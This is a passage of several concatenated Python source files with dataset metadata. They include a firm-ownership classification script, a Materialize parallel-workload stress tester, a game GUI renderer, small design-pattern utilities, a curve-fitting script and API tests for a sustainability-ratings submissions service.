pd.read_csv('Osiris_20_Full_EU17_NonmiGUOTypecopy.csv', na_values = ['n.a.'], encoding='cp1252')\r\ndf_prev = pd.read_csv('Osiris_171819_Full_EU17_NonmiGUOType_Bearbeitet_Ausgefullt.csv', encoding='cp1252')\r\n\r\n### Set Export File's Columns\r\nexport_cols = ['BvDIDnumber', 'Companyname', 'year', 'GUOName', 'GUOType', 'GUODirect', 'ICF', 'FFF'] \r\n\r\n\r\ncompanies = df_2020['BvDIDnumber'].unique()\r\n\r\nfirm_dfs = []\r\nfor company in companies:\r\n    df_firm = df_2020.loc[df_2020['BvDIDnumber'] == company]\r\n\r\n    ###### Classification\r\n    ### Firms Controlled by Individuals\r\n    df_firm.loc[(df_firm['GUOType'] == 'One or more named individuals or families') | (df_firm['GUOType'] 
== 'Employees, managers, directors'), 'ICF'] = 1\r\n df_firm.loc[df_firm['ICF'] != 1, 'ICF'] = 0\r\n\r\n ### Family Founding Firms\r\n df_firm.loc[:, 'FFF'] = ''\r\n df_firm.loc[df_firm['ICF'] == 0, 'FFF'] = 0\r\n\r\n firm_dfs.append(df_firm)\r\n\r\nfirm_dfs.append(df_prev)\r\ndf_total = pd.concat(firm_dfs)\r\ndf_total = df_total[export_cols]\r\ndf_total = df_total.sort_values(by = ['BvDIDnumber', 'year', 'GUODirect'], ascending = True)\r\n\r\n### Carry over Classification from 2019\r\ncompanies = df_total['BvDIDnumber'].unique()\r\nfor company in companies:\r\n df_firm = df_total.loc[df_total['BvDIDnumber'] == company]\r\n # print(df_firm)\r\n if len(df_firm.loc[df_firm['year'] == 2019]) >= 1 and len(df_firm.loc[df_firm['year'] == 2020]) >= 1:\r\n if df_firm.loc[df_firm['year'] == 2019, 'FFF'].values[0] == 1:\r\n GUOname_2019 = df_firm.loc[df_firm['year'] == 2019, 'GUOName'].values[0]\r\n GUOname_2020 = df_firm.loc[df_firm['year'] == 2020, 'GUOName'].values[0]\r\n if GUOname_2019 == GUOname_2020:\r\n df_total.loc[(df_total['year'] == 2020) & (df_total['BvDIDnumber'] == company), 'FFF'] = 1\r\n df_total.loc[(df_total['year'] == 2020) & (df_total['BvDIDnumber'] == company), 'ICF'] = 0\r\n else:\r\n pass\r\n\r\ndf_total.to_csv('test1.csv')\r\n\r\nprint('Finished')","sub_path":"Classification.py","file_name":"Classification.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"242078247","text":"# Copyright Materialize, Inc. and contributors. All rights reserved.\n#\n# Use of this software is governed by the Business Source License\n# included in the LICENSE file at the root of this repository.\n#\n# As of the Change Date specified in that file, in accordance with\n# the Business Source License, use of this software will be governed\n# by the Apache License, Version 2.0.\n\nimport argparse\nimport datetime\nimport os\nimport random\nimport sys\nimport threading\nimport time\nfrom collections import Counter, defaultdict\nfrom typing import DefaultDict, List, Optional, Type\n\nimport pg8000\n\nfrom materialize.mzcompose import Composition\nfrom materialize.mzcompose.services import DEFAULT_SYSTEM_PARAMETERS\nfrom materialize.parallel_workload.action import (\n Action,\n CancelAction,\n KillAction,\n ddl_action_list,\n dml_nontrans_action_list,\n fetch_action_list,\n read_action_list,\n write_action_list,\n)\nfrom materialize.parallel_workload.database import Database\nfrom materialize.parallel_workload.executor import Executor, initialize_logging\nfrom materialize.parallel_workload.settings import Complexity, Scenario\nfrom materialize.parallel_workload.worker import Worker\n\nSEED_RANGE = 1_000_000\nREPORT_TIME = 10\n\n\ndef run(\n host: str,\n port: int,\n system_port: int,\n seed: str,\n runtime: int,\n complexity: Complexity,\n scenario: Scenario,\n num_threads: Optional[int],\n composition: Optional[Composition],\n) -> None:\n num_threads = num_threads or os.cpu_count() or 10\n random.seed(seed)\n\n print(\n f\"--- Running with: --seed={seed} --threads={num_threads} --runtime={runtime} --complexity={complexity.value} --scenario={scenario.value} (--host={host} --port={port})\"\n )\n initialize_logging()\n\n system_conn = pg8000.connect(\n host=host, port=system_port, user=\"mz_system\", database=\"materialize\"\n )\n system_conn.autocommit = True\n with system_conn.cursor() as cur:\n cur.execute(\"ALTER SYSTEM SET max_schemas_per_database = 105\")\n cur.execute(\"ALTER SYSTEM SET max_tables = 
105\")\n cur.execute(\"ALTER SYSTEM SET max_materialized_views = 105\")\n cur.execute(\"ALTER SYSTEM SET max_sources = 105\")\n cur.execute(\"ALTER SYSTEM SET max_roles = 105\")\n cur.execute(\"ALTER SYSTEM SET max_clusters = 105\")\n cur.execute(\"ALTER SYSTEM SET max_replicas_per_cluster = 105\")\n system_conn.close()\n\n end_time = (\n datetime.datetime.now() + datetime.timedelta(seconds=runtime)\n ).timestamp()\n\n rng = random.Random(random.randrange(SEED_RANGE))\n database = Database(rng, seed, host, port, system_port, complexity, scenario)\n conn = pg8000.connect(host=host, port=port, user=\"materialize\")\n conn.autocommit = True\n with conn.cursor() as cur:\n database.create(Executor(rng, cur))\n conn.close()\n\n conn = pg8000.connect(\n host=host, port=port, user=\"materialize\", database=str(database)\n )\n conn.autocommit = True\n with conn.cursor() as cur:\n database.create_relations(Executor(rng, cur))\n conn.close()\n\n workers = []\n threads = []\n for i in range(num_threads):\n worker_rng = random.Random(rng.randrange(SEED_RANGE))\n weights: List[float]\n if complexity == Complexity.DDL:\n weights = [60, 30, 30, 30, 10]\n elif complexity == Complexity.DML:\n weights = [60, 30, 30, 30, 0]\n elif complexity == Complexity.Read:\n weights = [60, 30, 0, 0, 0]\n else:\n raise ValueError(f\"Unknown complexity {complexity}\")\n action_list = worker_rng.choices(\n [\n read_action_list,\n fetch_action_list,\n write_action_list,\n dml_nontrans_action_list,\n ddl_action_list,\n ],\n weights,\n )[0]\n actions = [\n action_class(worker_rng, database)\n for action_class in action_list.action_classes\n ]\n worker = Worker(\n worker_rng,\n actions,\n action_list.weights,\n end_time,\n action_list.autocommit,\n system=False,\n )\n thread_name = f\"worker_{i}\"\n print(\n f\"{thread_name}: {', '.join(action_class.__name__ for action_class in action_list.action_classes)}\"\n )\n workers.append(worker)\n\n thread = threading.Thread(\n name=thread_name,\n target=worker.run,\n args=(host, port, \"materialize\", str(database)),\n )\n thread.start()\n threads.append(thread)\n\n if scenario == Scenario.Cancel:\n worker = Worker(\n worker_rng,\n [CancelAction(worker_rng, database, workers)],\n [1],\n end_time,\n autocommit=False,\n system=True,\n )\n workers.append(worker)\n thread = threading.Thread(\n name=\"cancel\",\n target=worker.run,\n args=(host, system_port, \"mz_system\", str(database)),\n )\n thread.start()\n threads.append(thread)\n elif scenario == Scenario.Kill:\n assert composition, \"Kill scenario only works in mzcompose\"\n worker = Worker(\n worker_rng,\n [KillAction(worker_rng, database, composition)],\n [1],\n end_time,\n autocommit=False,\n system=False,\n )\n workers.append(worker)\n thread = threading.Thread(\n name=\"kill\",\n target=worker.run,\n args=(host, port, \"materialize\", str(database)),\n )\n thread.start()\n threads.append(thread)\n elif scenario == Scenario.Regression:\n pass\n else:\n raise ValueError(f\"Unknown scenario {scenario}\")\n\n num_queries = 0\n try:\n while time.time() < end_time:\n for thread in threads:\n if not thread.is_alive():\n for worker in workers:\n worker.end_time = time.time()\n raise Exception(f\"Thread {thread.name} failed, exiting\")\n time.sleep(REPORT_TIME)\n print(\n \"QPS: \"\n + \" \".join(\n f\"{worker.num_queries / REPORT_TIME:05.1f}\" for worker in workers\n )\n )\n for worker in workers:\n num_queries += worker.num_queries\n worker.num_queries = 0\n except KeyboardInterrupt:\n print(\"Keyboard interrupt, exiting\")\n for 
worker in workers:\n            worker.end_time = time.time()\n\n    for thread in threads:\n        thread.join()\n\n    conn = pg8000.connect(host=host, port=port, user=\"materialize\")\n    conn.autocommit = True\n    with conn.cursor() as cur:\n        print(f\"Dropping database {database}\")\n        database.drop(Executor(rng, cur))\n    conn.close()\n\n    ignored_errors: DefaultDict[str, Counter[Type[Action]]] = defaultdict(Counter)\n    num_failures = 0\n    for worker in workers:\n        for action_class, counter in worker.ignored_errors.items():\n            ignored_errors[action_class].update(counter)\n    for counter in ignored_errors.values():\n        for count in counter.values():\n            num_failures += count\n\n    failed = 100.0 * num_failures / num_queries if num_queries else 0\n    print(f\"Queries executed: {num_queries} ({failed:.0f}% failed)\")\n    print(\"Error statistics:\")\n    for error, counter in ignored_errors.items():\n        text = \", \".join(\n            f\"{action_class.__name__}: {count}\"\n            for action_class, count in counter.items()\n        )\n        print(f\"  {error}: {text}\")\n\n\ndef parse_common_args(parser: argparse.ArgumentParser) -> None:\n    parser.add_argument(\"--seed\", type=str, default=str(int(time.time())))\n    parser.add_argument(\"--runtime\", default=600, type=int, help=\"Runtime in seconds\")\n    parser.add_argument(\n        \"--complexity\",\n        default=\"ddl\",\n        type=str,\n        choices=[elem.value for elem in Complexity],\n    )\n    parser.add_argument(\n        \"--scenario\",\n        default=\"regression\",\n        type=str,\n        choices=[elem.value for elem in Scenario],\n    )\n    parser.add_argument(\n        \"--threads\",\n        type=int,\n        help=\"Number of threads to run, by default number of SMT threads\",\n    )\n\n\ndef main() -> int:\n    parser = argparse.ArgumentParser(\n        prog=\"parallel-workload\",\n        formatter_class=argparse.RawDescriptionHelpFormatter,\n        description=\"Run a parallel workload against Materialize\",\n    )\n\n    parser.add_argument(\"--host\", default=\"localhost\", type=str)\n    parser.add_argument(\"--port\", default=6875, type=int)\n    parser.add_argument(\"--system-port\", default=6877, type=int)\n    parse_common_args(parser)\n\n    args = parser.parse_args()\n\n    system_conn = pg8000.connect(\n        host=args.host, port=args.system_port, user=\"mz_system\", database=\"materialize\"\n    )\n    system_conn.autocommit = True\n    with system_conn.cursor() as cur:\n        # TODO: Currently the same as mzcompose default settings, add\n        # more settings and shuffle them\n        for key, value in DEFAULT_SYSTEM_PARAMETERS.items():\n            cur.execute(f\"ALTER SYSTEM SET {key} = '{value}'\")\n    system_conn.close()\n\n    run(\n        args.host,\n        args.port,\n        args.system_port,\n        args.seed,\n        args.runtime,\n        Complexity(args.complexity),\n        Scenario(args.scenario),\n        args.threads,\n        composition=None,  # only works in mzcompose\n    )\n    return 0\n\n\nif __name__ == \"__main__\":\n    sys.exit(main())\n","sub_path":"misc/python/materialize/parallel_workload/parallel_workload.py","file_name":"parallel_workload.py","file_ext":"py","file_size_in_byte":9613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"638646082","text":"from Player import *\nimport datetime\n\nclass GUI():\n    \n    def __init__(self):\n        self.playerSlot = 0\n        self.type = \"player\"\n    \n    def drawGui(self, Game, Cam):\n        \"\"\"Draw GUI and various aspects like abilities, etc.\"\"\"\n        fill(103, 108, 126, 200)\n        x = -Cam.xshift + 430 # Top left corner of the GUI panel\n        y = -Cam.yshift + 930\n        w = 1100\n        h = 150\n        \n        # Allows for viewing attributes of any Attackable\n        if(self.type == \"player\"):\n            p1 = Game.PT.players[self.playerSlot]\n        elif(self.type == \"structure\"):\n            p1 = Game.ST.structures[self.playerSlot]\n        elif(self.type == \"creep\"):\n            p1 = Game.CT.creep[self.playerSlot]\n        else:\n            p1 = Game.PT.players[0]\n\n        rect(x,y, w, h) # GUI panel\n\n        # Game Time bar\n        gtbx = -Cam.xshift + width/2\n        gtby = -Cam.yshift\n        quad(gtbx - 75, gtby, gtbx + 75, gtby, gtbx + 55, gtby+55, gtbx - 55, gtby+55)\n        \n        # Game Time text\n        fill(255)\n        textSize(20)\n        time = datetime.timedelta(seconds = Game.time)\n        text(str(time), gtbx, gtby + 35)\n        \n        # Health bar background\n        fill(0,0,0)\n        rect(x + 250, y + 70, 600, 50, 5, 5, 5, 5)\n        # Health bar foreground\n        fill(0,204,20)\n        if(p1.hp >= 0):\n            rect(x + 250, y + 70, round(600 * p1.hp/p1.hpMax), 50, 5, 5, 5, 5)\n        \n        if(self.type == \"player\"): \n            # Experience bar background \n            fill(0,0,0, 100)\n            rect(x + 25, y + 70, 200, 50, 5, 5, 5, 5)\n            # Experience bar foreground \n            fill(255, 190, 0)\n            if(p1.lvl < 25):\n                rect(x + 25, y + 70, round(200 * p1.xp/xpToLevel[p1.lvl]), 50, 5, 5, 5, 5)\n            else:\n                rect(x + 25, y + 70, 200, 50, 5, 5, 5, 5)\n        \n        # Ability bar background \n        fill(0,0,0, 50)\n        rect(x + 850 + 20, y + 35, 100, 100)\n        rect(x + 850 + 130, y + 35, 100, 100)\n        \n        if(self.type == \"player\"): # Only players have ability cooldowns \n            # Ability bar foreground\n            fill(0,0,0,150)\n            index = -1\n            for i in range(0,len(Game.PT.players[self.playerSlot].debuffs)):\n                if(Game.PT.players[self.playerSlot].debuffs[i].debuff == \"ab1cd\"):\n                    index = int(i)\n                    break\n            if(index != -1):\n                rect(x + 850 + 20, y + 35, 100, int((100 * (float(p1.debuffs[index].time) / p1.ab1cooldown))) + 1)\n            \n            index = -1\n            for i in range(0,len(Game.PT.players[self.playerSlot].debuffs)):\n                if(Game.PT.players[self.playerSlot].debuffs[i].debuff == \"ab2cd\"):\n                    index = int(i)\n                    break\n            if(index != -1):\n                rect(x + 850 + 130, y + 35, 100, int((100 * (float(p1.debuffs[index].time) / p1.ab2cooldown))) + 1) \n        \n        textAlign(CENTER)\n        fill(255)\n        \n        # Teacher name\n        textSize(40)\n        text(p1.name, x + w/2, y + 45)\n        \n        # Health bar text\n        textSize(25)\n        text(str(int(p1.hp)) + \"/\" + str(p1.hpMax), x + 550, y + 105)\n        \n        # Experience bar text\n        if(self.type == \"player\"):\n            text(\"Level \" + str(p1.lvl), x + 125, y + 105)\n        \n        # Ability name text\n        textSize(12)\n        text(p1.ab1name, x + 850 + 20 + 50, y + 30)\n        text(p1.ab2name, x + 850 + 130 + 50, y + 30)\n        \n        # Frames per second\n        textSize(12)\n        fill(0,0,0, 100)\n        text(int(frameRate), 10 - Cam.xshift, 10 - Cam.yshift)\n        \n        # End of game message\n        if Game.ST.structures[0].hp <= 0 or Game.ST.structures[9].hp <= 0:\n            textSize(128)\n            textAlign(CENTER, CENTER)\n            if Game.ST.structures[9].hp <= 0 and Game.ST.structures[0].hp <= 0:\n                fill (0, 255, 0)\n                text(\"Both Nexuses are dead. Check with server for winner\", x+540, y-480)\n            elif Game.ST.structures[9].hp <= 0:\n                fill(0, 0, 255)\n                text(\"Blue Alliance Wins. Check with server if close\", x+540, y-480)\n            elif Game.ST.structures[0].hp <= 0:\n                fill(255, 0, 0)\n                text(\"Red Alliance Wins\", x+540, y-480)\n","sub_path":"src/Client/Driver/GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":4414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"605387735","text":"\"\"\" Simulation core utilities\n\n:Author: Arthur Goldberg \n:Date: 2018-02-26\n:Copyright: 2018, Karr Lab\n:License: MIT\n\"\"\"\nfrom abc import ABCMeta, abstractmethod\n\n\nclass ConcreteABCMeta(ABCMeta):\n    \"\"\" A concrete subclass of ABCMeta that's used to combine metaclasses\n\n    In particular, this makes it easy to create a \"most derived metaclass\" that includes\n    ABCMetas and a custom Meta, and avoid \"TypeError: metaclass conflict\".\n\n    See https://docs.python.org/3/reference/datamodel.html#determining-the-appropriate-metaclass,\n    PEP 3119 and https://stackoverflow.com/a/31429212\n    \"\"\"\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n        if self.__abstractmethods__:\n            raise TypeError(\"{} has not implemented abstract methods {}\".format(\n                self.__name__, \", \".join(self.__abstractmethods__)))\n","sub_path":"wc_sim/core/ignore/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"282797193","text":"\"\"\"\r\nMonostate (or Borg) - A variation of the Singleton intended to guarantee that the state of the object\r\nis the same across all instances. Compared with the Singleton, the Monostate works better with\r\ninheritance.\r\n\r\n\"\"\"\r\n\r\nclass StringReprMixin:\r\n    def __str__(self):\r\n        params = ', '.join([f'{k}={v}' for k, v in self.__dict__.items()])\r\n        return f'{self.__class__.__name__}({params})'\r\n\r\n    def __repr__(self):\r\n        return self.__str__()\r\n\r\nclass MonoStateSimple(StringReprMixin):\r\n    _state = {'x': 10,'y': 20}\r\n\r\n    def __init__(self, nome=None):\r\n        self.__dict__ = self._state\r\n\r\n        if nome is not None:\r\n            self.nome = nome\r\n    \r\nif __name__ == \"__main__\":\r\n    m1 = MonoStateSimple()\r\n    m2 = MonoStateSimple()\r\n    print(m1)\r\n    print(m2)","sub_path":"DesignPatterns/monostate_1.py","file_name":"monostate_1.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"424807082","text":"import math\nimport numpy as np\n\ndelta = 0.05 #shifts initial max thickness aft\nPIRAD = 3.14159\nTWOPI = 2 * PIRAD\nRqD = PIRAD / 180\n\nNp = 6 #number of points\ntau_S = np.array(np.zeros(Np)) #plus one because 1 to n is preferred\nzet_S = np.array(np.zeros(Np))\nchi_S = np.array(np.zeros(Np))\n\n#these points are USER INPUTS\ntau_S[0] = 0.00\ntau_S[1] = 0.03\ntau_S[2] = 0.19\ntau_S[3] = 0.50\ntau_S[4] = 0.88\ntau_S[5] = 1.00\n\nzet_S[0] = 0.00\nzet_S[1] = 0.0007\nzet_S[2] = -0.049\nzet_S[3] = 0.00\nzet_S[4] = 0.0488\nzet_S[5] = 0.00\n\nLeft_to_Right = 1\nn = Np - 1\nc = np.array(np.zeros(n))\nX = np.array(np.zeros(Np))\nY = np.array(np.zeros(Np))\n\nfor i in range(0,Np):\n    X[i] = tau_S[i]\n    Y[i] = zet_S[i]\n\n#call polynomial\nXo = X[0]\nYo = Y[0]\nXn = X[n]\nYn = Y[n]\n\nA = np.matrix(np.zeros((n,n)))\nB = np.matrix(np.zeros((n,1)))\n\nfor i in range(0, n):\n    if(Left_to_Right == 1):\n        B[i] = Y[i+1] - Yo\n    else:\n        #mirror of the left-to-right case, anchored at (Xn, Yn)\n        B[i] = Y[n-1-i] - Yn\n    for j in range(0, n):\n        if(Left_to_Right == 1):\n            A[i,j] = (X[i+1] - Xo) ** (j+1)\n        else:\n            A[i,j] = 
(X[n-1-i] - Xn) ** (j+1)\n\n#solve the linear system\n\ncoefficient = np.linalg.solve(A,B)\ny_equation = \"1-(1-\"+str(delta)+\")*sin(pi*u)+\"+str(delta)+\"*sin(3*pi*u)\"\n\nz_equation = \"\"\nfor i in range(1,n+1):\n    z_equation = z_equation + str(coefficient.item(i-1)) + \"*u**\"+str(i)\n    if(i != n):\n        z_equation = z_equation + \"+\"\n\nprint(z_equation)\nprint(y_equation)\n","sub_path":"legacy/Parametric_Cubic_Spline.py","file_name":"Parametric_Cubic_Spline.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"117661068","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom numpy import pi\nfrom numpy.random import random, seed\nfrom modules.growth import spawn, spawn_curl\n\nNMAX = 10**7\nSIZE = 10000\nONE = 1./SIZE\n\nRAD = 0.1\n\nSTP = ONE*0.5\nNEARL = 4*ONE\nFARL = 200*ONE\n\nPROCS = 6\n\nMID = 0.5\n\nLINEWIDTH = 5.*ONE\n\nSTEPS_ITT = 500\nNINIT = 20\n\nBACK = [1,1,1,1]\nFRONT = [0,0,0,1]\n\nTWOPI = pi*2.\n\n\ndef steps(df,steps_itt):\n\n  for i in xrange(steps_itt):\n\n    df.optimize_avoid(STP)\n    spawn_curl(df,NEARL)\n\n\ndef main():\n\n  from time import time\n  from itertools import count\n\n  from render.render import Render\n  from modules.helpers import print_stats\n  from modules.show import show\n  from modules.show import show_closed\n\n  from differentialLine import DifferentialLine\n\n\n  DF = DifferentialLine(NMAX, FARL*2, NEARL, FARL, PROCS)\n\n  render = Render(SIZE, BACK, FRONT)\n\n  render.ctx.set_source_rgba(*FRONT)\n  render.ctx.set_line_width(LINEWIDTH)\n\n  angles = sorted(random(NINIT))\n\n  DF.init_circle_segment(MID,MID,RAD, angles)\n\n\n  for i in count():\n\n    t_start = time()\n\n    steps(DF,STEPS_ITT)\n\n    t_stop = time()\n\n    print_stats(i*STEPS_ITT,t_stop-t_start,DF)\n\n    fn = './res/oryx_bb_{:010d}.png'.format(i*STEPS_ITT)\n    edges_coordinates = DF.get_edges_coordinates()\n    show(render,edges_coordinates,fn)\n\n\n    fn = './res/oryx_bb_closed_{:010d}.png'.format(i*STEPS_ITT)\n    sorted_vert_coordinates = DF.get_sorted_vert_coordinates()\n    show_closed(render,sorted_vert_coordinates,fn)\n\n\nif __name__ == '__main__':\n\n  if False:\n\n    import pyximport\n    pyximport.install()\n    import pstats, cProfile\n\n    fn = './profile/profile'\n    cProfile.runctx(\"main()\", globals(), locals(), fn)\n    p = pstats.Stats(fn)\n    p.strip_dirs().sort_stats('cumulative').print_stats()\n\n  else:\n\n    main()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"161366362","text":"\"\"\"\nTests for submissions API.\n\"\"\"\nimport json\n\nfrom stars.apps.api.test import ReadOnlyResourceTestCase\n\nfrom stars.apps.submissions.models import (CategorySubmission,\n                                           CreditUserSubmission,\n                                           LongTextSubmission,\n                                           SubcategorySubmission,\n                                           SubmissionSet)\n\n\nsubmissions_list_path = '/api/0.1/submissions/'\n\n\ndef submissions_detail_path(submissionset_id):\n    return '{list_path}{submissionset_id}/'.format(\n        list_path=submissions_list_path,\n        submissionset_id=submissionset_id)\n\n\nRATED_SUBMISSIONSET_ID = 75\nUNRATED_SUBMISSIONSET_ID = 688\nLOCKED_SUBMISSIONSET_ID = 429\nRATED_NON_REPORTER_SUBMISSIONSET_ID = RATED_SUBMISSIONSET_ID\nRATED_REPORTER_SUBMISSIONSET_ID = 113\n\n\nclass SubmissionSetResourceTestCase(ReadOnlyResourceTestCase):\n\n    __test__ = True  # Override ReadOnlyResourceTestCase.__test__ for nose.\n\n    detail_path = submissions_detail_path(RATED_SUBMISSIONSET_ID)\n    list_path = 
submissions_list_path\n\n def test_get_submissions_list_requires_auth(self):\n self.requires_auth(self.list_path)\n\n def test_get_submissions_list(self):\n resp = self.get(self.list_path)\n self.assertValidJSONResponse(resp)\n\n def test_get_submissions_detail_requires_auth(self):\n self.requires_auth(self.detail_path)\n\n def test_get_submissions_detail(self):\n resp = self.get(self.detail_path)\n self.assertValidJSONResponse(resp)\n\n def test_get_unrated_submission(self):\n # Get a submission set that should be filtered:\n resp = self.get(submissions_detail_path(UNRATED_SUBMISSIONSET_ID))\n self.assertHttpNotFound(resp)\n\n def test_unrated_submissions_are_hidden(self):\n resp = self.get(self.list_path + '?limit=0')\n payload = json.loads(resp.content)\n visible_submissionsets = payload['objects']\n visible_submissionset_ids = [ss['id'] for ss\n in visible_submissionsets]\n self.assertNotIn(UNRATED_SUBMISSIONSET_ID,\n visible_submissionset_ids)\n\n def test_get_locked_submission(self):\n # Get a submission set that should be filtered:\n resp = self.get(submissions_detail_path(LOCKED_SUBMISSIONSET_ID))\n self.assertHttpNotFound(resp)\n\n def test_locked_submissions_are_hidden(self):\n resp = self.get(self.list_path + '?limit=0')\n payload = json.loads(resp.content)\n visible_submissionsets = payload['objects']\n visible_submissionset_ids = [ss['id'] for ss\n in visible_submissionsets]\n self.assertNotIn(LOCKED_SUBMISSIONSET_ID,\n visible_submissionset_ids)\n\n def test_rated_unlocked_submissions_are_visible(self):\n resp = self.get(self.list_path + '?limit=0')\n payload = json.loads(resp.content)\n visible_submissionsets = payload['objects']\n visible_submissionset_ids = [ss['id'] for ss\n in visible_submissionsets]\n rated_submissionset_ids = [\n submissionset.id\n for submissionset in\n SubmissionSet.objects.get_rated().filter(is_locked=False)]\n self.assertItemsEqual(visible_submissionset_ids,\n rated_submissionset_ids)\n\n def test_scoring_hidden_for_reporter(self):\n path = submissions_detail_path(RATED_REPORTER_SUBMISSIONSET_ID)\n resp = self.get(path)\n payload = json.loads(resp.content)\n self.assertTrue(payload['score'] is None)\n\n def test_scoring_shown_for_non_reporter(self):\n path = submissions_detail_path(RATED_NON_REPORTER_SUBMISSIONSET_ID)\n resp = self.get(path)\n payload = json.loads(resp.content)\n self.assertFalse(payload['score'] is None)\n\n\nclass CategorySubmissionResourceTestCase(ReadOnlyResourceTestCase):\n\n __test__ = True # Override ReadOnlyResourceTestCase.__test__ for nose.\n\n RATED_CATEGORYSUBMISSION_ID = 91\n UNRATED_CATEGORYSUBMISSION_ID = 2176\n\n # detail_path and list_path are defined for\n # ReadOnlyResourceTestCase tests.\n\n @property\n def list_path(self):\n return self._list_path(rated_submissionset=True)\n\n @property\n def detail_path(self):\n return self._detail_path(rated_submissionset=True)\n\n def _list_path(self, rated_submissionset):\n \"\"\"rated_submissionset is True or False.\"\"\"\n submissionset_id = (RATED_SUBMISSIONSET_ID if rated_submissionset\n else UNRATED_SUBMISSIONSET_ID)\n return submissions_detail_path(submissionset_id) + 'category/'\n\n def _detail_path(self, rated_submissionset):\n \"\"\"Detail URI for one CategorySubmission of a SubmissionSet.\n The CategorySubmission belongs to a SubmissionSet that's rated\n if rated_submissionset is True, otherwise it belongs to an unrated\n SubmissionSet.\n \"\"\"\n catsub_id = (\n self.RATED_CATEGORYSUBMISSION_ID if rated_submissionset\n else self.UNRATED_CATEGORYSUBMISSION_ID)\n 
return (self._list_path(rated_submissionset) +\n self.detail_path_part(catsub_id))\n\n def detail_path_part(self, categorysubmission_id):\n \"\"\"Detail part of path for a specific CategorySubmission.\"\"\"\n categorysubmission = CategorySubmission.objects.get(\n pk=categorysubmission_id)\n return str(categorysubmission.category.id) + '/'\n\n def test_get_categorysubmission_list_requires_auth(self):\n self.requires_auth(self._list_path(rated_submissionset=True))\n\n def test_get_categorysubmission_list(self):\n resp = self.get(self._list_path(rated_submissionset=True))\n self.assertValidJSONResponse(resp)\n\n def test_get_categorysubmission_detail_requires_auth(self):\n self.requires_auth(self._detail_path(rated_submissionset=True))\n\n def test_get_categorysubmission_detail(self):\n path = self._detail_path(rated_submissionset=True)\n resp = self.get(path)\n self.assertValidJSONResponse(resp)\n\n def test_get_categorysubmission_for_unrated_submissionset(self):\n path = self._detail_path(rated_submissionset=False)\n resp = self.get(path)\n self.assertHttpGone(resp)\n\n\nclass SubcategorySubmissionResourceTestCase(ReadOnlyResourceTestCase):\n\n # TODO - add test for UNRATED_SUBCATEGORYSUBMISSION_ID?\n\n __test__ = True # Override ReadOnlyResourceTestCase.__test__ for nose.\n\n RATED_SUBCATEGORYSUBMISSION_ID = 429\n UNRATED_SUBCATEGORYSUBMISSION_ID = None\n RATED_NON_REPORTER_SUBCATEGORYSUBMISSION_WITH_POINTS_ID = (\n RATED_SUBCATEGORYSUBMISSION_ID)\n RATED_REPORTER_SUBCATEGORYSUBMISSION_WITH_POINTS_ID = 1291\n\n # detail_path and list_path are defined for\n # ReadOnlyResourceTestCase tests.\n\n @property\n def list_path(self):\n return self._list_path(rated_submissionset=True)\n\n @property\n def detail_path(self):\n return self._detail_path(rated_submissionset=True)\n\n def _list_path(self, rated_submissionset):\n \"\"\"List URI for the SubcategorySubmissions of a SubmissionSet.\n The SubcategorySubmissions belong to a SubmissionSet that's rated\n if rated_submissionset is True, otherwise they belong to an unrated\n SubmissionSet.\n \"\"\"\n submissionset_id = (RATED_SUBMISSIONSET_ID if rated_submissionset\n else UNRATED_SUBMISSIONSET_ID)\n return self.list_path_for_submissionset(submissionset_id)\n\n def list_path_for_submissionset(self, submissionset_id):\n return submissions_detail_path(submissionset_id) + 'subcategory/'\n\n def _detail_path(self, rated_submissionset):\n \"\"\"Detail URI for one SubcategorySubmission of a SubmissionSet.\n The SubcategorySubmission belongs to a SubmissionSet that's rated\n if rated_submissionset is True, otherwise it belongs to an unrated\n SubmissionSet.\n \"\"\"\n subcatsub_id = (\n self.RATED_SUBCATEGORYSUBMISSION_ID if rated_submissionset\n else self.UNRATED_SUBCATEGORYSUBMISSION_ID)\n return (self._list_path(rated_submissionset) +\n self.detail_path_part(subcatsub_id))\n\n def detail_path_part(self, subcategorysubmission_id):\n \"\"\"Part of detail path for a specific SubcategorySubmission.\"\"\"\n subcategorysubmission = SubcategorySubmission.objects.get(\n pk=subcategorysubmission_id)\n return str(subcategorysubmission.subcategory.id) + '/'\n\n def test_get_subcategorysubmission_list_requires_auth(self):\n self.requires_auth(self._list_path(rated_submissionset=True))\n\n def test_get_subcategorysubmission_list(self):\n resp = self.get(self._list_path(rated_submissionset=True))\n self.assertValidJSONResponse(resp)\n\n def test_get_subcategorysubmission_detail_requires_auth(self):\n self.requires_auth(self._detail_path(rated_submissionset=True))\n\n 
def test_get_subcategorysubmission_detail(self):\n        path = self._detail_path(rated_submissionset=True)\n        resp = self.get(path)\n        self.assertValidJSONResponse(resp)\n\n    def test_dehydrate_points(self):\n\n        # Make sure points aren't None for everybody:\n        path = (\n            self.list_path_for_submissionset(\n                RATED_NON_REPORTER_SUBMISSIONSET_ID) +\n            self.detail_path_part(\n                self.RATED_NON_REPORTER_SUBCATEGORYSUBMISSION_WITH_POINTS_ID))\n\n        resp = self.get(path)\n\n        self.assertValidJSONResponse(resp)\n        payload = json.loads(resp.content)\n        self.assertTrue(payload['points'] is not None)\n\n        # Now check that they're None for reporters:\n        path = (\n            self.list_path_for_submissionset(\n                RATED_REPORTER_SUBMISSIONSET_ID) +\n            self.detail_path_part(\n                self.RATED_REPORTER_SUBCATEGORYSUBMISSION_WITH_POINTS_ID))\n\n        resp = self.get(path)\n\n        self.assertValidJSONResponse(resp)\n        payload = json.loads(resp.content)\n        